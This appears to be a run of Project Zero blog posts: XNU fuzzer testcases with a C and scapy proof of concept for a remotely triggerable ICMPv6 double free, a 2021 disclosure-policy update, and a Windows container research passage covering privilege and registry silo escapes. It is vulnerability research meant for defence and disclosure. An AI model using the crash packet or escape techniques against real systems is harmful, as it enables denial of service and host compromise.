    protocol: IPPROTO_IP

  }

}

commands {

  connectx {

    socket: FD_0

    endpoints {

      sae_srcif: IFIDX_CASE_1

      sae_dstaddr {

        sockaddr_generic {

          sa_family: AF_MULTIPATH

          sa_data: "bugmbuf_debutoeloListen_dedeloListen_dedebuloListete_debugmbuf_debutoeloListen_dedeloListen_dedebuloListeListen_dedebuloListe_dtrte" # string length 131

        }

      }

    }

    associd: ASSOCID_CASE_0

  }

}

data_provider: ""


This is a lot easier to read! It appears that SockFuzzer managed to open a socket from the
AF_MULTIPATH domain and called connectx on it with a sockaddr using an unexpected sa_family, in this case AF_MULTIPATH. Then the large sa_data field was used to overwrite memory. You can see some artifacts of heuristics used by the fuzzer to guess strings as “listen” and “mbuf” appear in the input. This testcase could be further simplified by modifying the sa_data to a repeated character, but I left it as is so you can see exactly what it’s like to work with the output of this fuzzer.

In my experience, the protobuf-formatted syscalls and packet descriptions were highly useful for reproducing crashes and tended to work on the first attempt. I didn’t have an excellent setup for debugging on-device, so I tried to lean on the fuzzing framework as much as I could to understand issues before proceeding with the expensive process of reproducing them.

In my previous post describing the “SockPuppet” vulnerability, I walked through one of the newly discovered vulnerabilities, from protobuf to exploit. I’d like to share another original protobuf bug report for a remotely-triggered vulnerability I reported here.

commands {

  socket {

    domain: AF_INET6

    so_type: SOCK_RAW

    protocol: IPPROTO_IP

  }

}

commands {

  set_sock_opt {

    level: SOL_SOCKET

    name: SO_RCVBUF

    val: "\021\000\000\000"

  }

}

commands {

  set_sock_opt {

    level: IPPROTO_IPV6

    name: IP_FW_ZERO

    val: "\377\377\377\377"

  }

}

commands {

  ip_input {

    tcp6_packet {

      ip6_hdr {

        ip6_hdrctl {

          ip6_un1_flow: 0

          ip6_un1_plen: 0

          ip6_un1_nxt: IPPROTO_ICMPV6

          ip6_un1_hlim: 0

        }

        ip6_src: IN6_ADDR_LOOPBACK

        ip6_dst: IN6_ADDR_ANY

      }

      tcp_hdr {

        th_sport: PORT_2

        th_dport: PORT_1

        th_seq: SEQ_1

        th_ack: SEQ_1

        th_off: 0

        th_win: 0

        th_sum: 0

        th_urp: 0

        is_pure_syn: false

        is_pure_ack: false

      }

      data: "\377\377\377\377\377\377\377\377\377\377\377\377q\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377"

    }

  }

}

data_provider: ""

This automatically minimized test case requires some human translation to a report that’s actionable by developers who don’t have access to our fuzzing framework. The test creates a socket and sets some options before delivering a crafted ICMPv6 packet. You can see how the packet grammar we specified comes in handy. I started by transcribing the first three syscall messages directly by writing the following C program.

#include <sys/socket.h>

#define __APPLE_USE_RFC_3542

#include <netinet/in.h>

#include <stdio.h>

#include <unistd.h>

int main() {

    int fd = socket(AF_INET6, SOCK_RAW, IPPROTO_IP);

    if (fd < 0) {

        printf("failed\n");

        return 0;

    }

    int res;

    // This is not needed to cause a crash on macOS 10.14.6, but you can

    // try setting this option if you can't reproduce the issue.

    // int space = 1;

    // res = setsockopt(fd, SOL_SOCKET, SO_RCVBUF, &space, sizeof(space));

    // printf("res1: %d\n", res);

    int enable = 1;

    res = setsockopt(fd, IPPROTO_IPV6, IPV6_RECVPATHMTU, &enable, sizeof(enable));

    printf("res2: %d\n", res);

    // Keep the socket open without terminating.

    while (1) {

        sleep(5);

    }

    close(fd);

    return 0;

}

With the socket open, it’s now a matter of sending a special ICMPv6 packet to trigger the bug. Using the original crash as a guide, I reviewed the code around the crashing instruction to understand which parts of the input were relevant. I discovered that sending a “packet too big” notification would reach the buggy code, so I used the scapy library for Python to send the buggy packet locally. My kernel panicked, confirming the double free vulnerability.

from scapy.all import sr1, IPv6, ICMPv6PacketTooBig, raw

outer = IPv6(dst="::1") / ICMPv6PacketTooBig() / ("\x41"*40)

print(raw(outer).hex())

p = sr1(outer)

if p:

    p.show()

Creating a working PoC from the crashing protobuf input took about an hour, thanks to the straightforward mapping from grammar to syscalls/network input and the utility of being able to debug the local crashing “kernel” using gdb.

Drawbacks

Any fuzzing project of this size will require design decisions that have some tradeoffs. The most obvious issue is the inability to detect race conditions. Threading bugs can be found with fuzzing but are still best left to static analysis and manual review as fuzzers can’t currently deal with the state space of interleaving threads. Maybe this will change in the future, but today it’s an issue. I accepted this problem and removed threading completely from the fuzzer; some bugs were missed by this, such as a race condition in the bind syscall.

Another issue lies in the fact that by replacing so much functionality by hand, it’s hard to extend the fuzzer trivially to support additional attack surfaces. This is evidenced by another issue I missed in packet filtering. I don’t support VFS at the moment, so I can’t access the bpf device. A syzkaller-like project would have less trouble with supporting this code since VFS would already be working. I made an explicit decision to build a simple tool that works very effectively and meticulously, but this can mean missing some low hanging fruit due to the effort involved.

Per-test case determinism is an issue that I’ve solved only partially. If test cases aren’t deterministic, libFuzzer becomes less efficient as it thinks some tests are finding new coverage when they really depend on one that was run previously. To mitigate this problem, I track open file descriptors manually and run all of the garbage collection thread functions after each test case. Unfortunately, there are many ioctls that change state in the background. It’s hard to keep track of them to clean up properly but they are important enough that it’s not worth disabling them just to improve determinism. If I were working on a long-term well-resourced overhaul of the XNU network stack, I would probably make sure there’s a way to cleanly tear down the whole stack to prevent this problem.

Perhaps the largest caveat of this project is its reliance on source code. Without the efficiency and productivity losses that come with binary-only research, I can study the problem more closely to the source. But I humbly admit that this approach ignores many targets and doesn’t necessarily match real attackers’ workflows. Real attackers take the shortest path they can to find an exploitable vulnerability, and often that path is through bugs found via binary-based fuzzing or reverse engineering and auditing. I intend to discover some of the best practices for fuzzing with the source and then migrate this approach to work with binaries. Binary instrumentation can assist in coverage guided fuzzing, but some of my tricks around substituting fake implementations or changing behavior to be more fuzz-friendly is a more significant burden when working with binaries. But I believe these are tractable problems, and I expect researchers can adapt some of these techniques to binary-only fuzzing efforts, even if there is additional overhead.

Open Sourcing and Future Work

This fuzzer is now open source on GitHub. I invite you to study the code and improve it! I’d like to continue the development of this fuzzer semi-publicly. Some modifications that yield new vulnerabilities may need to be embargoed until relevant patches go out. Still, I hope that I can be as transparent as possible in my research. By working publicly, it may be possible to bring the original XNU project and this fuzzer closer together by sharing the efforts. I’m hoping the upstream developers can make use of this project to perform their own testing and perhaps make their own improvements to XNU to make this type of testing more accessible. There’s plenty of remaining work to improve the existing grammar, add support for new subsystems, and deal with some high-level design improvements such as adding proper threading support.

An interesting property of the current fuzzer is that despite reaching coverage saturation on ClusterFuzz after many months, there is still reachable but uncovered code due to the enormous search space. This means that improvements in coverage-guided fuzzing could find new bugs. I’d like to encourage teams who perform fuzzing engine research to use this project as a baseline. If you find a bug, you can take the credit for it! I simply hope you share your improvements with me and the rest of the community.

Conclusion

Modern kernel development has some catching up to do. XNU and Linux suffer from some process failures that lead to shipping security regressions. Kernels, perhaps the most security-critical component of operating systems, are becoming increasingly fragile as memory corruption issues become easier to discover. Implementing better mitigations is half the battle; we need better kernel unit testing to make identifying and fixing (even non-security) bugs cheaper.

Since my last post, Apple has increased the frequency of its open-source releases. This is great for end-user security. The more publicly that Apple can develop XNU, the more that external contributors like myself may have a chance to contribute fixes and improvements directly. Maintaining internal branches for upcoming product launches while keeping most development open has helped Chromium and Android security, and I believe XNU’s development could follow this model. As software engineering grows as a field, our experience has shown us that open, shared, and continuous development has a real impact on software quality and stability by improving developer productivity. If you don’t invest in CI, unit testing, security reviews, and fuzzing, attackers may do that for you - and users pay the cost whether they recognize it or not.

Policy and Disclosure: 2021 Edition

Posted by Tim Willis, Project Zero

At Project Zero, we spend a lot of time discussing and evaluating vulnerability disclosure policies and their consequences for users, vendors, fellow security researchers, and software security norms of the broader industry. We aim to be a vulnerability research team that benefits everyone, working across the entire ecosystem to help make 0-day hard.

 

We remain committed to adapting our policies and practices to best achieve our mission,  demonstrating this commitment at the beginning of last year with our 2020 Policy and Disclosure Trial.

As part of our annual year-end review, we evaluated our policy goals, solicited input from those that receive most of our reports, and adjusted our approach for 2021.

Summary of changes for 2021

Starting today, we're changing our Disclosure Policy to refocus on reducing the time it takes for vulnerabilities to get fixed, improving the current industry benchmarks on disclosure timeframes, as well as changing when we release technical details.

The short version: Project Zero won't share technical details of a vulnerability for 30 days if a vendor patches it before the 90-day or 7-day deadline. The 30-day period is intended for user patch adoption.

The full list of changes for 2021:

2020 Trial ("Full 90")

2021 Trial ("90+30")

  1. Public disclosure occurs 90 days after an initial vulnerability report, regardless of when the bug is fixed. Technical details (initial report plus any additional work) are published on Day 90. A 14-day grace period* is allowed.
            
    Earlier disclosure with mutual agreement.
  1. Disclosure deadline of 90 days. If an issue remains unpatched after 90 days, technical details are published immediately. If the issue is fixed within 90 days, technical details are published 30 days after the fix. A 14-day grace period* is allowed.
            
    Earlier disclosure with mutual agreement.
  1. For vulnerabilities that were actively exploited in-the-wild against users, public disclosure occurred 7 days after the initial vulnerability report, regardless of when the bug is fixed.




    In-the wild vulnerabilities are not offered a grace period
    *

    Earlier disclosure with mutual agreement.
  1. Disclosure deadline of 7 days for issues that are being actively exploited in-the-wild against users. If an issue remains unpatched after 7 days, technical details are published immediately. If the issue is fixed within 7 days, technical details are published 30 days after the fix.

    Vendors can request a 3-day grace period* for in-the-wild bugs.

    Earlier disclosure with mutual agreement.
  1. Technical details are immediately published when a vulnerability is patched in the grace period*.

    (e.g. Patched on Day 100 in grace period, disclosure on Day 100)
  1. If a grace period* is granted, it uses up a portion of the 30-day patch adoption period.

    (e.g. Patched on Day 100 in grace period, disclosure on Day 120)

Elements of the 2020 trial that will carry over to 2021:

2020 Trial + 2021 Trial

1. Policy goals:

  • Faster patch development
  • Thorough patch development
  • Improved patch adoption

2. If Project Zero discovers a variant of a previously reported Project Zero bug, technical details of the variant will be added to the existing Project Zero report (which may be already public) and the report will not receive a new deadline.

3. If a 90-day deadline is missed, technical details are made public on Day 90, unless a grace period* is requested and confirmed prior to deadline expiry.

4. If a 7-day deadline is missed, technical details are made public on Day 7, unless a grace period* is requested and confirmed prior to deadline expiry.

* The grace period is an additional 14 days that a vendor can request if they do not expect that a reported vulnerability will be fixed within 90 days, but do expect it to be fixed within 104 days. Grace periods will not be granted for vulnerabilities that are expected to take longer than 104 days to fix.  For vulnerabilities that are being actively exploited and reported under the 7 day deadline, the grace period is an additional 3 days that a vendor can request if they do not expect that a reported vulnerability will be fixed within 7 days, but do expect it to be fixed within 10 days.

Rationale on changes for 2021

As we discussed in last year's "Policy and Disclosure: 2020 Edition", our three vulnerability disclosure policy goals are:

  1. Faster patch development: shorten the time between a bug report and a fix being available for users.
  2. Thorough patch development: ensure that each fix is correct and comprehensive.
  3. Improved patch adoption: shorten the time between a patch being released and users installing it.

Our policy trial for 2020 aimed to balance all three of these goals, while keeping our policy consistent, simple, and fair. Vendors were given 90 days to work on the full cycle of patch development and patch adoption. The idea was if a vendor wanted more time for users to install a patch, they would prioritize shipping the fix earlier in the 90 day cycle rather than later.

In practice however, we didn't observe a significant shift in patch development timelines, and we continued to receive feedback from vendors that they were concerned about publicly releasing technical details about vulnerabilities and exploits before most users had installed the patch. In other words, the implied timeline for patch adoption wasn't clearly understood.

The goal of our 2021 policy update is to make the patch adoption timeline an explicit part of our vulnerability disclosure policy. Vendors will now have 90 days for patch development, and an additional 30 days for patch adoption.

This 90+30 policy gives vendors more time than our current policy, as jumping straight to a 60+30 policy (or similar) would likely be too abrupt and disruptive. Our preference is to choose a starting point that can be consistently met by most vendors, and then gradually lower both patch development and patch adoption timelines.

For example, based on our current data tracking vulnerability patch times, it's likely that we can move to a "84+28" model for 2022 (having deadlines evenly divisible by 7 significantly reduces the chance our deadlines fall on a weekend). Beyond that, we will keep a close eye on the data and continue to encourage innovation and investment in bug triage, patch development, testing, and update infrastructure.

Risk and benefits

Much of the debate around vulnerability disclosure is caught up on the issue of whether rapidly releasing technical details benefits attackers or defenders more. From our time in the defensive community, we've seen firsthand how the open and timely sharing of technical details helps protect users across the Internet. But we also have listened to the concerns from others around the much more visible "opportunistic" attacks that may come from quickly releasing technical details.

We continue to believe that the benefits to the defensive community of Project Zero's publications outweigh the risks of disclosure, but we're willing to incorporate feedback into our policy in the interests of getting the best possible results for user security. Security researchers need to be able to work closely with vendors and open source projects on a range of technical, process, and policy issues -- and heated discussions about the risk and benefits of technical vulnerability details or proof-of-concept exploits has been a significant roadblock.

While the 90+30 policy will be a slight regression from the perspective of rapidly releasing technical details, we're also signaling our intent to shorten our 90-day disclosure deadline in the near future. We anticipate slowly reducing time-to-patch and speeding up patch adoption over the coming years until a steady state is reached.

Finally, we understand that this change will make it more difficult for the defensive community to quickly perform their own risk assessment, prioritize patch deployment, test patch efficacy, quickly find variants, deploy available mitigations, and develop detection signatures. We're always interested in hearing about Project Zero's publications being used for defensive purposes, and we encourage users to ask their vendors/suppliers for actionable technical details to be shared in security advisories.

Conclusion

Moving to a "90+30" model allows us to decouple time to patch from patch adoption time, reduce the contentious debate around attacker/defender trade-offs and the sharing of technical details, while advocating to reduce the amount of time that end users are vulnerable to known attacks.

Disclosure policy is a complex topic with many trade-offs to be made, and this wasn't an easy decision to make. We are optimistic that our 2021 policy and disclosure trial lays a good foundation for the future, and has a balance of incentives that will lead to positive improvements to user security.

Who Contains the Containers?

Posted by James Forshaw, Project Zero

This is a short blog post about a research project I conducted on Windows Server Containers that resulted in four privilege escalations which Microsoft fixed in March 2021. In the post, I describe what led to this research, my research process, and insights into what to look for if you’re researching this area.

Windows Containers Background

Windows 10 and its server counterparts added support for application containerization. The implementation in Windows is similar in concept to Linux containers, but of course wildly different. The well-known Docker platform supports Windows containers which leads to the availability of related projects such as Kubernetes running on Windows. You can read a bit of background on Windows containers on MSDN. I’m not going to go in any depth on how containers work in Linux as very little is applicable to Windows.

The primary goal of a container is to hide the real OS from an application. For example, in Docker you can download a standard container image which contains a completely separate copy of Windows. The image is used to build the container which uses a feature of the Windows kernel called a Server Silo allowing for redirection of resources such as the object manager, registry and networking. The server silo is a special type of Job object, which can be assigned to a process.

Diagram of a server silo. Shows an application interacting with the registry, object manager and network and how being in the silo redirects that access to another location.

The application running in the container, as far as possible, will believe it’s running in its own unique OS instance. Any changes it makes to the system will only affect the container and not the real OS which is hosting it. This allows an administrator to bring up new instances of the application easily as any system or OS differences can be hidden.

For example the container could be moved between different Windows systems, or even to a Linux system with the appropriate virtualization and the application shouldn’t be able to tell the difference. Containers shouldn’t be confused with virtualization however, which provides a consistent hardware interface to the OS. A container is more about providing a consistent OS interface to applications.

Realistically, containers are mainly about using their isolation primitives for hiding the real OS and providing a consistent configuration in which an application can execute. However, there’s also some potential security benefit to running inside a container, as the application shouldn’t be able to directly interact with other processes and resources on the host.

There are two supported types of containers: Windows Server Containers and Hyper-V Isolated Containers. Windows Server Containers run under the current kernel as separate processes inside a server silo. Therefore a single kernel vulnerability would allow you to escape the container and access the host system.

Hyper-V Isolated Containers still run in a server silo, but do so in a separate lightweight VM. You can still use the same kernel vulnerability to escape the server silo, but you’re still constrained by the VM and hypervisor. To fully escape and access the host you’d need a separate VM escape as well.

Diagram comparing Windows Server Containers and Hyper-V Isolated Containers. The server container on the left directly accesses the hosts kernel. For Hyper-V the container accesses a virtualized kernel, which dispatches to the hypervisor and then back to the original host kernel. This shows the additional security boundary in place to make Hyper-V isolated containers more secure.

The current MSRC security servicing criteria states that Windows Server Containers are not a security boundary as you still have direct access to the kernel. However, if you use Hyper-V isolation, a silo escape wouldn’t compromise the host OS directly as the security boundary is at the hypervisor level. That said, escaping the server silo is likely to be the first step in attacking Hyper-V containers meaning an escape is still useful as part of a chain.

As Windows Server Containers are not a security boundary any bugs in the feature won’t result in a security bulletin being issued. Any issues might be fixed in the next major version of Windows, but they might not be.

Origins of the Research

Over a year ago I was asked for some advice by Daniel Prizmant, a researcher at Palo Alto Networks on some details around Windows object manager symbolic links. Daniel was doing research into Windows containers, and wanted help on a feature which allows symbolic links to be marked as global which allows them to reference objects outside the server silo. I recommend reading Daniel’s blog post for more in-depth information about Windows containers.

Knowing a little bit about symbolic links I was able to help fill in some details and usage. About seven months later Daniel released a second blog post, this time describing how to use global symbolic links to escape a server silo Windows container. The result of the exploit is the user in the container can access resources outside of the container, such as files.

The global symbolic link feature needs SeTcbPrivilege to be enabled, which can only be accessed from SYSTEM. The exploit therefore involved injecting into a system process from the default administrator user and running the exploit from there. Based on the blog post, I thought it could be done easier without injection. You could impersonate a SYSTEM token and do the exploit all in process. I wrote a simple proof-of-concept in PowerShell and put it up on Github.

Fast forward another few months and a Googler reached out to ask me some questions about Windows Server Containers. Another researcher at Palo Alto Networks had reported to Google Cloud that Google Kubernetes Engine (GKE) was vulnerable to the issue Daniel had identified. Google Cloud was using Windows Server Containers to run Kubernetes, so it was possible to escape the container and access the host, which was not supposed to be accessible.

Microsoft had not patched the issue and it was still exploitable. They hadn’t patched it because Microsoft does not consider these issues to be serviceable. Therefore the GKE team was looking for mitigations. One proposed mitigation was to enforce the containers to run under the ContainerUser account instead of the ContainerAdministrator. As the reported issue only works when running as an administrator that would seem to be sufficient.

However, I wasn’t convinced there weren't similar vulnerabilities which could be exploited from a non-administrator user. Therefore I decided to do my own research into Windows Server Containers to determine if the guidance of using ContainerUser would really eliminate the risks.

While I wasn’t expecting MS to fix anything I found it would at least allow me to provide internal feedback to the GKE team so they might be able to better mitigate the issues. It also establishes a rough baseline of the risks involved in using Windows Server Containers. It’s known to be problematic, but how problematic?

Research Process

The first step was to get some code running in a representative container. Nothing that had been reported was specific to GKE, so I made the assumption I could just run a local Windows Server Container.

Setting up your own server silo from scratch is undocumented and almost certainly unnecessary. When you enable the Container support feature in Windows, the Hyper-V Host Compute Service is installed. This takes care of setting up both Hyper-V and process isolated containers. The API to interact with this service isn’t officially documented, however Microsoft has provided public wrappers (with scant documentation), for example this is the Go wrapper.

Realistically it’s best to just use Docker which takes the MS provided Go wrapper and implements the more familiar Docker CLI. While there’s likely to be Docker-specific escapes, the core functionality of a Windows Docker container is all provided by Microsoft so would be in scope. Note, there are two versions of Docker: Enterprise which is only for server systems and Desktop. I primarily used Desktop for convenience.

As an aside, MSRC does not count any issue as crossing a security boundary where being a member of the Hyper-V Administrators group is a prerequisite. Using the Hyper-V Host Compute Service requires membership of the Hyper-V Administrators group. However Docker runs at sufficient privilege to not need the user to be a member of the group. Instead access to Docker is gated by membership of the separate docker-users group. If you get code running under a non-administrator user that has membership of the docker-users group you can use that to get full administrator privileges by abusing Docker’s server silo support.

Fortunately for me most Windows Docker images come with .NET and PowerShell installed so I could use my existing toolset. I wrote a simple docker file containing the following:

FROM mcr.microsoft.com/windows/servercore:20H2

USER ContainerUser

COPY NtObjectManager c:/NtObjectManager

CMD [ "powershell", "-noexit", "-command", \

  "Import-Module c:/NtObjectManager/NtObjectManager.psd1" ]

This docker file will download a Windows Server Core 20H2 container image from the Microsoft Container Registry, copy in my NtObjectManager PowerShell module and then set up a command to load that module on startup. I also specified that the PowerShell process would run as the user ContainerUser so that I could test the mitigation assumptions. If you don’t specify a user it’ll run as ContainerAdministrator by default.

Note, when using process isolation mode the container image version must match the host OS. This is because the kernel is shared between the host and the container and any mismatch between the user-mode code and the kernel could result in compatibility issues. Therefore if you’re trying to replicate this you might need to change the name for the container image.

Create a directory and copy the contents of the docker file to the filename dockerfile in that directory. Also copy in a copy of my PowerShell module into the same directory under the NtObjectManager directory. Then in a command prompt in that directory run the following commands to build and run the container.

C:\container> docker build -t test_image .

Step 1/4 : FROM mcr.microsoft.com/windows/servercore:20H2

 ---> b29adf5cd4f0

Step 2/4 : USER ContainerUser

 ---> Running in ac03df015872

Removing intermediate container ac03df015872

 ---> 31b9978b5f34

Step 3/4 : COPY NtObjectManager c:/NtObjectManager

 ---> fa42b3e6a37f

Step 4/4 : CMD [ "powershell", "-noexit", "-command",   "Import-Module c:/NtObjectManager/NtObjectManager.psd1" ]

 ---> Running in 86cad2271d38

Removing intermediate container 86cad2271d38

 ---> e7d150417261

Successfully built e7d150417261

Successfully tagged test_image:latest

C:\container> docker run --isolation=process -it test_image

PS>

I wanted to run code using process isolation rather than in Hyper-V isolation, so I needed to specify the --isolation=process argument. This would allow me to more easily see system interactions as I could directly debug container processes if needed. For example, you can use Process Monitor to monitor file and registry access. Docker Enterprise uses process isolation by default, whereas Desktop uses Hyper-V isolation.

I now had a PowerShell console running inside the container as ContainerUser. A quick way to check that it was successful is to try and find the CExecSvc process, which is the Container Execution Agent service. This service is used to spawn your initial PowerShell console.

PS> Get-Process -Name CExecSvc

Handles  NPM(K)    PM(K)      WS(K)     CPU(s)     Id  SI ProcessName

-------  ------    -----      -----     ------     --  -- -----------

     86       6     1044       5020              4560   6 CExecSvc

With a running container it was time to start poking around to see what’s available. The first thing I did was dump the ContainerUser’s token just to see what groups and privileges were assigned. You can use the Show-NtTokenEffective command to do that.

PS> Show-NtTokenEffective -User -Group -Privilege

USER INFORMATION

----------------

Name                       Sid

----                       ---

User Manager\ContainerUser S-1-5-93-2-2

GROUP SID INFORMATION

-----------------

Name                                   Attributes

----                                   ----------

Mandatory Label\High Mandatory Level   Integrity, ...

Everyone                               Mandatory, ...

BUILTIN\Users                          Mandatory, ...

NT AUTHORITY\SERVICE                   Mandatory, ...

CONSOLE LOGON                          Mandatory, ...

NT AUTHORITY\Authenticated Users       Mandatory, ...

NT AUTHORITY\This Organization         Mandatory, ...

NT AUTHORITY\LogonSessionId_0_10357759 Mandatory, ...

LOCAL                                  Mandatory, ...

User Manager\AllContainers             Mandatory, ...

PRIVILEGE INFORMATION

---------------------

Name                          Luid              Enabled

----                          ----              -------

SeChangeNotifyPrivilege       00000000-00000017 True

SeImpersonatePrivilege        00000000-0000001D True

SeCreateGlobalPrivilege       00000000-0000001E True

SeIncreaseWorkingSetPrivilege 00000000-00000021 False

The groups didn’t seem that interesting, however looking at the privileges we have SeImpersonatePrivilege. If you have this privilege you can impersonate any other user on the system including administrators. MSRC considers having SeImpersonatePrivilege as administrator equivalent, meaning if you have it you can assume you can get to administrator. Seems ContainerUser is not quite as normal as it should be.

That was a very bad (or good) start to my research. The prior assumption was that running as ContainerUser would not grant administrator privileges, and therefore the global symbolic link issue couldn’t be directly exploited. However that turns out to not be the case in practice. As an example you can use the public RogueWinRM exploit to get a SYSTEM token as long as WinRM isn’t enabled, which is the case on most Windows container images. There are no doubt other less well known techniques to achieve the same thing. The code which creates the user account is in CExecSvc, which is code owned by Microsoft and is not specific to Docker.

NextI used the NtObject drive provider to list the object manager namespace. For example checking the Device directory shows what device objects are available.

PS> ls NtObject:\Device

Name                                              TypeName

----                                              --------

Ip                                                SymbolicLink

Tcp6                                              SymbolicLink

Http                                              Directory

Ip6                                               SymbolicLink

ahcache                                           SymbolicLink

WMIDataDevice                                     SymbolicLink

LanmanDatagramReceiver                            SymbolicLink

Tcp                                               SymbolicLink

LanmanRedirector                                  SymbolicLink

DxgKrnl                                           SymbolicLink

ConDrv                                            SymbolicLink

Null                                              SymbolicLink

MailslotRedirector                                SymbolicLink

NamedPipe                                         Device

Udp6                                              SymbolicLink

VhdHardDisk{5ac9b14d-61f3-4b41-9bbf-a2f5b2d6f182} SymbolicLink

KsecDD                                            SymbolicLink

DeviceApi                                         SymbolicLink

MountPointManager                                 Device

...

Interestingly most of the device drivers are symbolic links (almost certainly global) instead of being actual device objects. But there are a few real device objects available. Even the VHD disk volume is a symbolic link to a device outside the container. There’s likely to be some things lurking in accessible devices which could be exploited, but I was still in reconnaissance mode.

What about the registry? The container should be providing its own Registry hives and so there shouldn’t be anything accessible outside of that. After a few tests I noticed something very odd.

PS> ls HKLM:\SOFTWARE | Select-Object Name

Name

----

HKEY_LOCAL_MACHINE\SOFTWARE\Classes

HKEY_LOCAL_MACHINE\SOFTWARE\Clients

HKEY_LOCAL_MACHINE\SOFTWARE\DefaultUserEnvironment

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft

HKEY_LOCAL_MACHINE\SOFTWARE\ODBC

HKEY_LOCAL_MACHINE\SOFTWARE\OpenSSH

HKEY_LOCAL_MACHINE\SOFTWARE\Policies

HKEY_LOCAL_MACHINE\SOFTWARE\RegisteredApplications

HKEY_LOCAL_MACHINE\SOFTWARE\Setup

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node

PS> ls NtObject:\REGISTRY\MACHINE\SOFTWARE | Select-Object Name

Name

----

Classes

Clients

DefaultUserEnvironment

Docker Inc.

Intel

Macromedia

Microsoft

ODBC

OEM

OpenSSH

Partner

Policies

RegisteredApplications

Windows

WOW6432Node

The first command is querying the local machine SOFTWARE hive using the built-in Registry drive provider. The second command is using my module’s object manager provider to list the same hive. If you look closely the list of keys is different between the two commands. Maybe I made a mistake somehow? I checked some other keys, for example the user hive attachment point:

PS> ls NtObject:\REGISTRY\USER | Select-Object Name

Name

----

.DEFAULT

S-1-5-19

S-1-5-20

S-1-5-21-426062036-3400565534-2975477557-1001

S-1-5-21-426062036-3400565534-2975477557-1001_Classes

S-1-5-21-426062036-3400565534-2975477557-1003

S-1-5-18

PS> Get-NtSid

Name                       Sid

----                       ---

User Manager\ContainerUser S-1-5-93-2-2

No, it still looked wrong. The ContainerUser’s SID is S-1-5-93-2-2, you’d expect to see a loaded hive for that user SID. However you don’t see one, instead you see S-1-5-21-426062036-3400565534-2975477557-1001 which is the SID of the user outside the container.

Something funny was going on. However, this behavior is something I’ve seen before. Back in 2016 I reported a bug with application hives where you couldn’t open the \REGISTRY\A attachment point directly, but you could if you opened \REGISTRY then did a relative open to A. It turns out that by luck my registry enumeration code in the module’s drive provider uses relative opens using the native system calls, whereas the PowerShell built-in uses absolute opens through the Win32 APIs. Therefore, this was a manifestation of a similar bug: doing a relative open was ignoring the registry overlays and giving access to the real hive.

This grants a non-administrator user access to any registry key on the host, as long as ContainerUser can pass the key’s access check. You could imagine the host storing some important data in the registry which the container can now read out, however using this to escape the container would be hard. That said, all you need to do is abuse SeImpersonatePrivilege to get administrator access and you can immediately start modifying the host’s registry hives.

The fact that I had two bugs in less than a day was somewhat concerning, however at least that knowledge can be applied to any mitigation strategy. I thought I should dig a bit deeper into the kernel to see what else I could exploit from a normal user.

A Little Bit of Reverse Engineering

While just doing basic inspection has been surprisingly fruitful it was likely to need some reverse engineering to shake out anything else. I know from previous experience on Desktop Bridge how the registry overlays and object manager redirection works when combined with silos. In the case of Desktop Bridge it uses application silos rather than server silos but they go through similar approaches.

The main enforcement mechanism used by the kernel to provide the container’s isolation is by calling a function to check whether the process is in a silo and doing something different based on the result. I decided to try and track down where the silo state was checked and see if I could find any misuse. You’d think the kernel would only have a few functions which would return the current silo state. Unfortunately you’d be wrong, the following is a short list of the functions I checked:

IoGetSilo, IoGetSiloParameters, MmIsSessionInCurrentServerSilo, OBP_GET_SILO_ROOT_DIRECTORY_FROM_SILO, ObGetSiloRootDirectoryPath, ObpGetSilosRootDirectory, PsGetCurrentServerSilo, PsGetCurrentServerSiloGlobals, PsGetCurrentServerSiloName, PsGetCurrentSilo, PsGetEffectiveServerSilo, PsGetHostSilo, PsGetJobServerSilo, PsGetJobSilo, PsGetParentSilo, PsGetPermanentSiloContext, PsGetProcessServerSilo, PsGetProcessSilo, PsGetServerSiloActiveConsoleId, PsGetServerSiloGlobals, PsGetServerSiloServiceSessionId, PsGetServerSiloState, PsGetSiloBySessionId, PsGetSiloContainerId, PsGetSiloContext, PsGetSiloIdentifier, PsGetSiloMonitorContextSlot, PsGetThreadServerSilo, PsIsCurrentThreadInServerSilo, PsIsHostSilo, PsIsProcessInAppSilo, PsIsProcessInSilo, PsIsServerSilo, PsIsThreadInSilo

Of course that’s not a comprehensive list of functions, but those are the ones that looked the most likely to either return the silo and its properties or check if something was in a silo. Checking the references to these functions wasn’t going to be comprehensive, for various reasons:

  1. We’re only checking for bad checks, not the lack of a check.
  2. The kernel has the structure type definition for the Job object which contains the silo, so the call could easily be inlined.
  3. We’re only checking the kernel, many of these functions are exported for driver use so could be called by other kernel components that we’re not looking at.

The first issue I found was due to a call to PsIsCurrentThreadInServerSilo. I noticed a reference to the function inside CmpOKToFollowLink which is a function that’s responsible for enforcing symlink checks in the registry. At a basic level, registry symbolic links are not allowed to traverse from an untrusted hive to a trusted hive.

For example if you put a symbolic link in the current user’s hive which redirects to the local machine hive the CmpOKToFollowLink will return FALSE when opening the key and the operation will fail. This prevents a user planting symbolic links in their hive and finding a privileged application which will write to that location to elevate privileges.

BOOLEAN CmpOKToFollowLink(PCMHIVE SourceHive, PCMHIVE TargetHive) {

  if (PsIsCurrentThreadInServerSilo() 

    || !TargetHive

    || TargetHive == SourceHive) {

    return TRUE;

  }

  if (SourceHive->Flags.Trusted)

    return FALSE;

  // Check trust list.

}

Looking at CmpOKToFollowLink we can see where PsIsCurrentThreadInServerSilo is being used. If the current thread is in a server silo then all links are allowed between any hives. The check for the trusted state of the source hive only happens after this initial check so is bypassed. I’d speculate that during development the registry overlays couldn’t be marked as trusted so a symbolic link in an overlay would not be followed to a trusted hive it was overlaying, causing problems. Someone presumably added this bypass to get things working, but no one realized they needed to remove it when support for trusted overlays was added.

To exploit this in a container I needed to find a privileged kernel component which would write to a registry key that I could control. I found a good primitive inside Win32k for supporting FlickInfo configuration (which seems to be related in some way to touch input, but it’s not documented). When setting the configuration Win32k would create a known key in the current user’s hive. I could then redirect the key creation to the local machine hive allowing creation of arbitrary keys in a privileged location. I don’t believe this primitive could be directly combined with the registry silo escape issue but I didn’t investigate too deeply. At a minimum this would allow a non-administrator user to elevate privileges inside a container, where you could then use registry silo escape to write to the host registry.

The second issue was due to a call to OBP_GET_SILO_ROOT_DIRECTORY_FROM_SILO. This function would get the root object manager namespace directory for a silo.

POBJECT_DIRECTORY OBP_GET_SILO_ROOT_DIRECTORY_FROM_SILO(PEJOB Silo) {

  if (Silo) {

    PPSP_STORAGE Storage = Silo->Storage;

    PPSP_SLOT Slot = Storage->Slot[PsObjectDirectorySiloContextSlot];

    if (Slot->Present)

      return Slot->Value;

